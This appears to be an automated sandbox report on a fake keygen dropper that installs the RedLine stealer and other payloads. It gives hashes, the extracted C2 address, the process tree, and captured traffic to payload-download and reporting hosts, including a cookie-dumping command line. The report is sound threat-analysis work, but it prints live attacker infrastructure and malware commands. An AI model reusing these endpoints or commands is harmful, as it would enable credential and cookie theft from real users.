Resubmissions

  • 24/05/2021, 05:31 UTC
    210524-b4dx7j71fj (score 10)
  • 21/05/2021, 13:30 UTC
    210521-r42mg8cghe (score 10)

Analysis

  • max time kernel
    1799s
  • max time network
    1562s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    21/05/2021, 13:30 UTC

General

  • Target
    keygen-step-4.exe
  • Size
    5.6MB
  • MD5
    a110ce3f7366c6bb12553ea17a793110
  • SHA1
    8e10076496347d6324382f20968f3b7c8516eedf
  • SHA256
    0e63f296fdc309cb1e487cd1a549d029d2a9144b8a050db274901030dc6ec0f3
  • SHA512
    dc9103da71a1143365f3c7f39c4a316a9b9cc6e337b601a95d13d68bba777d2145d79a9d44ac96edce71775819e4d4bb2bb0cf7e49627163237ec3580b25c3cf

Malware Config

Extracted

  • Family
    redline
  • Botnet
    ServLyla2
  • C2
    87.251.71.4:80

Signatures

  • PlugX

    PlugX is a RAT (Remote Access Trojan) that has been around since 2008.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload (2 IoCs)
  • Executes dropped EXE (8 IoCs)
  • UPX packed file (8 IoCs)

    Detects executables packed with UPX/modified UPX open source packer.

  • VMProtect packed file (3 IoCs)

    Detects executables packed with VMProtect commercial packer.

  • Checks computer location settings (2 TTPs, 1 IoCs)

    Looks up the country code configured in the registry, likely for geofencing.

  • Loads dropped DLL (1 IoCs)
  • Reads user/profile data of web browsers (2 TTPs)

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)
  • Adds Run key to start application (2 TTPs, 1 IoCs)
  • Checks whether UAC is enabled (1 TTPs, 1 IoCs)
  • Legitimate hosting services abused for malware hosting/C2 (1 TTPs)
  • Looks up external IP address via web service (1 IoCs)

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory (1 IoCs)
  • Suspicious use of SetThreadContext (2 IoCs)
  • Enumerates physical storage devices (1 TTPs)

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks processor information in registry (2 TTPs, 2 IoCs)

    Processor information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS (16 IoCs)
  • Modifies registry class (13 IoCs)
  • Suspicious behavior: EnumeratesProcesses (11 IoCs)
  • Suspicious use of AdjustPrivilegeToken (64 IoCs)
  • Suspicious use of WriteProcessMemory (63 IoCs)

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
    PID:1084
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
    PID:1140
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s SENS
    PID:1420
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s UserManager
    PID:1412
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
    PID:2800
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    PID:2780
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Browser
    PID:2696
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
    PID:2536
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
    PID:2528
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
    PID:1948
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Themes
    PID:1176
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
    PID:1008
  • C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe
    "C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe"
    • Suspicious use of WriteProcessMemory
    PID:1892
    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe"
      • Executes dropped EXE
      • Checks computer location settings
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:1456
      • C:\Windows\SysWOW64\rUNdlL32.eXe
        "C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\install.dll",setuser
        • Loads dropped DLL
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2816
    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\ABCbrow.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\ABCbrow.exe"
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3992
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4080
    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"
      • Executes dropped EXE
      • Checks whether UAC is enabled
      • Suspicious use of AdjustPrivilegeToken
      PID:2812
    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\gaoou.exe"
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious use of WriteProcessMemory
      PID:1728
      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        • Executes dropped EXE
        PID:1960
      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        PID:3584
      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        PID:5052
      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        PID:948
  • \??\c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s BITS
    • Suspicious use of SetThreadContext
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:752
    • C:\Windows\system32\svchost.exe
      C:\Windows\system32\svchost.exe -k SystemNetworkService
      • Drops file in System32 directory
      • Checks processor information in registry
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1112

Network

  • DNS email.yg9.me (SystemNetworkService)
    Remote address: 8.8.8.8:53
    Request
    email.yg9.me IN A
    Response
    email.yg9.me IN A 198.13.62.186
  • DNS email.yg9.me (SystemNetworkService)
    Remote address: 8.8.8.8:53
    Request
    email.yg9.me IN AAAA
    Response
  • DNS ma.pycharm3.ru (ABCbrow.exe)
    Remote address: 8.8.8.8:53
    Request
    ma.pycharm3.ru IN A
    Response
    ma.pycharm3.ru IN A 217.107.34.191
  • GET https://ma.pycharm3.ru/SystemRuntimeSerializationXmlFormatWriterGenerator80419 (ABCbrow.exe)
    Remote address: 217.107.34.191:443
    Request
    GET /SystemRuntimeSerializationXmlFormatWriterGenerator80419 HTTP/1.1
    Host: ma.pycharm3.ru
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Date: Fri, 21 May 2021 13:31:18 GMT
    Content-Type: text/html
    Content-Length: 211237
    Connection: keep-alive
    Server: Jino.ru/mod_pizza
    Last-Modified: Wed, 19 May 2021 16:32:37 GMT
    ETag: "87f44ac-33925-5c2b15fec3804"
    Accept-Ranges: bytes
  • GET http://101.36.107.74/seemorebty/il.php?e=jg6_6asg (jg6_6asg.exe)
    Remote address: 101.36.107.74:80
    Request
    GET /seemorebty/il.php?e=jg6_6asg HTTP/1.1
    Connection: Keep-Alive
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3
    Accept-Language: en-US,en;q=0.9
    Referer: https://www.facebook.com
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36
    Host: 101.36.107.74
    Response
    HTTP/1.1 200 OK
    Date: Fri, 21 May 2021 13:31:19 GMT
    Server: Apache/2.4.37 (centos)
    X-Powered-By: PHP/7.2.24
    Keep-Alive: timeout=5, max=100
    Connection: Keep-Alive
    Transfer-Encoding: chunked
    Content-Type: text/html; charset=UTF-8
  • DNS iplogger.org (gaoou.exe)
    Remote address: 8.8.8.8:53
    Request
    iplogger.org IN A
    Response
    iplogger.org IN A 88.99.66.31
  • GET https://iplogger.org/ZhvS4 (jg6_6asg.exe)
    Remote address: 88.99.66.31:443
    Request
    GET /ZhvS4 HTTP/1.1
    Connection: Keep-Alive
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image webp,image apng, q=0.8,application signed-exchange v=b3
    Accept-Language: en-US,en;q=0.9
    Referer: https://www.facebook.com
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit 537.36 (KHTML, like Gecko) Chrome 70.0.3538.110 Safari 537.36
    Host: iplogger.org
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 21 May 2021 13:31:19 GMT
    Content-Type: image/png
    Transfer-Encoding: chunked
    Connection: keep-alive
    Set-Cookie: PHPSESSID=u68jd87fg8mcnkeue5l3rgdhv2; path=/; HttpOnly
    Pragma: no-cache
    Set-Cookie: clhf03028ja=154.61.71.51; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=257444312; path=/
    Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
    Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
    Cache-Control: no-cache
    Expires: Thu, 01 Jan 1970 00:00:01 GMT
    Answers: 1
    whoami: 5f6f374a2d0823068d51889a32317054977c188115fe1c6b1b8e036330756be6
    Strict-Transport-Security: max-age=31536000; preload
    X-Frame-Options: DENY
  • DNS ip-api.com (gaoou.exe)
    Remote address: 8.8.8.8:53
    Request
    ip-api.com IN A
    Response
    ip-api.com IN A 208.95.112.1
  • GET http://ip-api.com/json/?fields=8198 (SystemNetworkService)
    Remote address: 208.95.112.1:80
    Request
    GET /json/?fields=8198 HTTP/1.1
    Accept: */*
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
    Host: ip-api.com
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Fri, 21 May 2021 13:31:25 GMT
    Content-Type: application/json; charset=utf-8
    Content-Length: 57
    Access-Control-Allow-Origin: *
    X-Ttl: 58
    X-Rl: 38
  • GET http://ip-api.com/json/?fields=8198 (SystemNetworkService)
    Remote address: 208.95.112.1:80
    Request
    GET /json/?fields=8198 HTTP/1.1
    Accept: */*
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
    Host: ip-api.com
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Fri, 21 May 2021 13:31:26 GMT
    Content-Type: application/json; charset=utf-8
    Content-Length: 57
    Access-Control-Allow-Origin: *
    X-Ttl: 58
    X-Rl: 27
  • GET http://ip-api.com/json/?fields=8198 (SystemNetworkService)
    Remote address: 208.95.112.1:80
    Request
    GET /json/?fields=8198 HTTP/1.1
    Accept: */*
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
    Host: ip-api.com
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Fri, 21 May 2021 13:31:26 GMT
    Content-Type: application/json; charset=utf-8
    Content-Length: 57
    Access-Control-Allow-Origin: *
    X-Ttl: 57
    X-Rl: 21
  • GET http://ip-api.com/json/?fields=8198 (SystemNetworkService)
    Remote address: 208.95.112.1:80
    Request
    GET /json/?fields=8198 HTTP/1.1
    Accept: */*
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
    Host: ip-api.com
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Fri, 21 May 2021 13:31:27 GMT
    Content-Type: application/json; charset=utf-8
    Content-Length: 57
    Access-Control-Allow-Origin: *
    X-Ttl: 57
    X-Rl: 16
  • GET http://ip-api.com/json/ (gaoou.exe)
    Remote address: 208.95.112.1:80
    Request
    GET /json/ HTTP/1.1
    Connection: Keep-Alive
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
    viewport-width: 1920
    Host: ip-api.com
    Response
    HTTP/1.1 200 OK
    Date: Fri, 21 May 2021 13:31:25 GMT
    Content-Type: application/json; charset=utf-8
    Content-Length: 323
    Access-Control-Allow-Origin: *
    X-Ttl: 58
    X-Rl: 35
  • DNS iw.gamegame.info (SystemNetworkService)
    Remote address: 8.8.8.8:53
    Request
    iw.gamegame.info IN A
    Response
    iw.gamegame.info IN A 104.21.21.221
    iw.gamegame.info IN A 172.67.200.215
  • POST http://iw.gamegame.info/report7.4.php (SystemNetworkService)
    Remote address: 104.21.21.221:80
    Request
    POST /report7.4.php HTTP/1.1
    Accept: */*
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
    Host: iw.gamegame.info
    Content-Length: 278
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Fri, 21 May 2021 13:31:26 GMT
    Content-Type: application/json; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    CF-Cache-Status: DYNAMIC
    cf-request-id: 0a30b8ba8300004c2cab1f1000000001
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=BeDACPmi%2Fb8YyKvpt3B367fGmlPb%2FEeknrtzYq2WXaAHquzonruW3%2FsJXF19QDqZ3yi8IVaDMvE26i1N1orARtBey6rQUghmFH5IGYA5yUTc"}],"group":"cf-nel","max_age":604800}
    NEL: {"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 652e2a3d992b4c2c-AMS
    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
  • POST http://iw.gamegame.info/report7.4.php (SystemNetworkService)
    Remote address: 104.21.21.221:80
    Request
    POST /report7.4.php HTTP/1.1
    Accept: */*
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
    Host: iw.gamegame.info
    Content-Length: 278
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Fri, 21 May 2021 13:31:27 GMT
    Content-Type: application/json; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    CF-Cache-Status: DYNAMIC
    cf-request-id: 0a30b8beb600004c2ca9bfe000000001
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=Ze0xuYoHwV6qzQWfhc%2B4Q0IBzsFTznUbQxC%2BSf7dOfSKVD9h5r97wFqWiAtKE5yGJiOUwQkE6tWTUEFmP1Z9XO52voP%2FHp1vynZwZlInmKoc"}],"group":"cf-nel","max_age":604800}
    NEL: {"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 652e2a445c5b4c2c-AMS
    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
  • POST http://iw.gamegame.info/report7.4.php (SystemNetworkService)
    Remote address: 104.21.21.221:80
    Request
    POST /report7.4.php HTTP/1.1
    Accept: */*
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
    Host: iw.gamegame.info
    Content-Length: 250
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Fri, 21 May 2021 13:31:27 GMT
    Content-Type: application/json; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    CF-Cache-Status: DYNAMIC
    cf-request-id: 0a30b8c0f100004c2c922b6000000001
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=Wx0%2Bp7f94kfoyLruq3XfP28Rn5p4NdvmcR9HmD1CZ92bo0beK%2Fw4djcJRoGBQ7%2FBqmGypUhMtJyCBbbric4DFmQ8uF1mjkLu6X1LnEO2sqpe"}],"group":"cf-nel","max_age":604800}
    NEL: {"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 652e2a47da584c2c-AMS
    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
  • POST http://87.251.71.4// (AddInProcess32.exe)
    Remote address: 87.251.71.4:80
    Request
    POST // HTTP/1.1
    Content-Type: text/xml; charset=utf-8
    SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
    Host: 87.251.71.4
    Content-Length: 137
    Expect: 100-continue
    Accept-Encoding: gzip, deflate
    Connection: Keep-Alive
  • DNS ol.gamegame.info (SystemNetworkService)
    Remote address: 8.8.8.8:53
    Request
    ol.gamegame.info IN A
    Response
    ol.gamegame.info IN A 172.67.200.215
    ol.gamegame.info IN A 104.21.21.221
  • POST http://ol.gamegame.info/report7.4.php (SystemNetworkService)
    Remote address: 172.67.200.215:80
    Request
    POST /report7.4.php HTTP/1.1
    Accept: */*
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36
    Host: ol.gamegame.info
    Content-Length: 278
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Date: Fri, 21 May 2021 13:31:26 GMT
    Content-Type: application/json; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: keep-alive
    CF-Cache-Status: DYNAMIC
    cf-request-id: 0a30b8bcd100004c377b292000000001
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=FT57JWW3P%2FihvSmjvax3j%2FQX2n4lGKccGsXFlcNfycHxOc8YTd6V0pY0P9Agn5vmKqrieA%2BuJLiaDOFwts%2F2YvLruVtY7is4%2F5BlTgT7b5nW"}],"group":"cf-nel","max_age":604800}
    NEL: {"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 652e2a414ef64c37-AMS
    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
                        • flag-unknown
                          DNS
                          www.facebook.com
                          gaoou.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          www.facebook.com
                          IN A
                          Response
                          www.facebook.com
                          IN CNAME
                          star-mini.c10r.facebook.com
                          star-mini.c10r.facebook.com
                          IN A
                          157.240.210.35
                        • flag-unknown
                          GET
                          https://www.facebook.com/
                          gaoou.exe
                          Remote address:
                          157.240.210.35:443
                          Request
                          GET / HTTP/1.1
                          Connection: Keep-Alive
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                          Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                          viewport-width: 1920
                          Sec-Fetch-Dest: document
                          Sec-Fetch-Mode: navigate
                          Sec-Fetch-Site: none
                          Sec-Fetch-User: ?1
                          Upgrade-Insecure-Requests: 1
                          Host: www.facebook.com
                          Response
                          HTTP/1.1 200 OK
                          content-security-policy: default-src facebook.com *.facebook.com fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com cdninstagram.com *.cdninstagram.com data: blob: 'self';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src data: blob: 'unsafe-inline' facebook.com *.facebook.com fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com cdninstagram.com *.cdninstagram.com;connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* attachment.fbsbx.com blob: *.cdninstagram.com 'self';block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c;
                          Cache-Control: private, no-cache, no-store, must-revalidate
                          X-Frame-Options: DENY
                          X-XSS-Protection: 0
                          Strict-Transport-Security: max-age=15552000; preload
                          X-Content-Type-Options: nosniff
                          Expires: Sat, 01 Jan 2000 00:00:00 GMT
                          Vary: Accept-Encoding
                          Pragma: no-cache
                          x-fb-rlafr: 0
                          Content-Type: text/html; charset="utf-8"
                          X-FB-Debug: JhFb3bXFfEbxkRaisg7cgAzcxkXoUS4DEd5ct5CZ18ybjN5fDsDKDclNbAuf5DUGvHjyHLeFpEdd9x1i1cIRoA==
                          Date: Fri, 21 May 2021 13:31:27 GMT
                          Priority: u=3,i
                          Transfer-Encoding: chunked
                          Alt-Svc: h3-29=":443"; ma=3600,h3-27=":443"; ma=3600
                          Connection: keep-alive
                        • flag-unknown
                          GET
                          https://www.facebook.com/
                          gaoou.exe
                          Remote address:
                          157.240.210.35:443
                          Request
                          GET / HTTP/1.1
                          Connection: Keep-Alive
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                          Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                          viewport-width: 1920
                          Sec-Fetch-Dest: document
                          Sec-Fetch-Mode: navigate
                          Sec-Fetch-Site: none
                          Sec-Fetch-User: ?1
                          Upgrade-Insecure-Requests: 1
                          Host: www.facebook.com
                          Response
                          HTTP/1.1 200 OK
                          content-security-policy: default-src facebook.com *.facebook.com fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com cdninstagram.com *.cdninstagram.com data: blob: 'self';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src data: blob: 'unsafe-inline' facebook.com *.facebook.com fbcdn.net *.fbcdn.net fbsbx.com *.fbsbx.com cdninstagram.com *.cdninstagram.com;connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* attachment.fbsbx.com blob: *.cdninstagram.com 'self';block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c;
                          Cache-Control: private, no-cache, no-store, must-revalidate
                          X-Frame-Options: DENY
                          X-XSS-Protection: 0
                          Strict-Transport-Security: max-age=15552000; preload
                          X-Content-Type-Options: nosniff
                          Expires: Sat, 01 Jan 2000 00:00:00 GMT
                          Vary: Accept-Encoding
                          Pragma: no-cache
                          x-fb-rlafr: 0
                          Content-Type: text/html; charset="utf-8"
                          X-FB-Debug: b3Tr6QzIszd+2mPfqFh2m8Mg1n9Aj0cG0/4twSBiI2VyQAINQje2FG59KjxOor7GMPPlAMP3JfjhBdgRzRT5sA==
                          Date: Fri, 21 May 2021 13:31:31 GMT
                          Priority: u=3,i
                          Transfer-Encoding: chunked
                          Alt-Svc: h3-29=":443"; ma=3600,h3-27=":443"; ma=3600
                          Connection: keep-alive
                        • flag-unknown
                          DNS
                          uyyge5w3ye.2ihsfa.com
                          gaoou.exe
                          Remote address:
                          8.8.8.8:53
                          Request
                          uyyge5w3ye.2ihsfa.com
                          IN A
                          Response
                          uyyge5w3ye.2ihsfa.com
                          IN A
                          88.218.92.148
                        • flag-unknown
                          GET
                          http://uyyge5w3ye.2ihsfa.com/api/fbtime
                          gaoou.exe
                          Remote address:
                          88.218.92.148:80
                          Request
                          GET /api/fbtime HTTP/1.1
                          Connection: Keep-Alive
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                          Host: uyyge5w3ye.2ihsfa.com
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 21 May 2021 13:31:32 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/7.3.21
                        • flag-unknown
                          POST
                          http://uyyge5w3ye.2ihsfa.com/api/?sid=486563&key=05b44e597079906fcc1d90d00559969d
                          gaoou.exe
                          Remote address:
                          88.218.92.148:80
                          Request
                          POST /api/?sid=486563&key=05b44e597079906fcc1d90d00559969d HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                          Content-Length: 266
                          Host: uyyge5w3ye.2ihsfa.com
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 21 May 2021 13:31:33 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Vary: Accept-Encoding
                          X-Powered-By: PHP/7.3.21
                        • flag-unknown
                          GET
                          https://iplogger.org/18hh57
                          gaoou.exe
                          Remote address:
                          88.99.66.31:443
                          Request
                          GET /18hh57 HTTP/1.1
                          Connection: Keep-Alive
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
                          Accept-Language: en,q=0.9;q=0.8,ja;q=0.7,af;q=0.6,am;q=0.5,sq;q=0.4,ar;q=0.3,an;q=0.2,hy;q=0.1,ast;q=0.1,az;q=0.1,bn;q=0.1,eu;q=0.1
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.60
                          viewport-width: 1920
                          Host: iplogger.org
                          Response
                          HTTP/1.1 200 OK
                          Server: nginx
                          Date: Fri, 21 May 2021 13:31:33 GMT
                          Content-Type: image/png
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Set-Cookie: PHPSESSID=7c648ej4t0s72c1jstnjt6jc07; path=/; HttpOnly
                          Pragma: no-cache
                          Set-Cookie: clhf03028ja=154.61.71.51; expires=Wed, 18-Jul-2029 05:49:51 GMT; Max-Age=257444298; path=/
                          Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                          Set-Cookie: timezone=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/
                          Cache-Control: no-cache
                          Expires: Thu, 01 Jan 1970 00:00:01 GMT
                          Answers: 1
                          whoami: 4c38501b4c5aaf3cd2110790c1c4143772251fc8a57642aeaa13ea09d06e72a2
                          Strict-Transport-Security: max-age=31536000; preload
